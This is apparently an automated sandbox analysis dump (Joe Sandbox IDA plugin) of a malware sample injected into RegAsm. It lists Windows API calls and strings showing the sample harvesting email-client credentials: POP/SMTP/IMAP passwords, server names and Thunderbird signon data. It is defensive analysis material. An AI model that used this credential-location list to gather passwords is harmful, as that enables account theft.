                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$Enummemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615280680-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                • API String ID: 3677997916-1155512374
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID: eBD
                                                                                                                                                                                • API String ID: 823142352-44267735
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                  • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1880195650-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1208763047-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                  • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$EnumOpen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1938129365-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Enum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2928410991-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                  • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                  • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$mallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
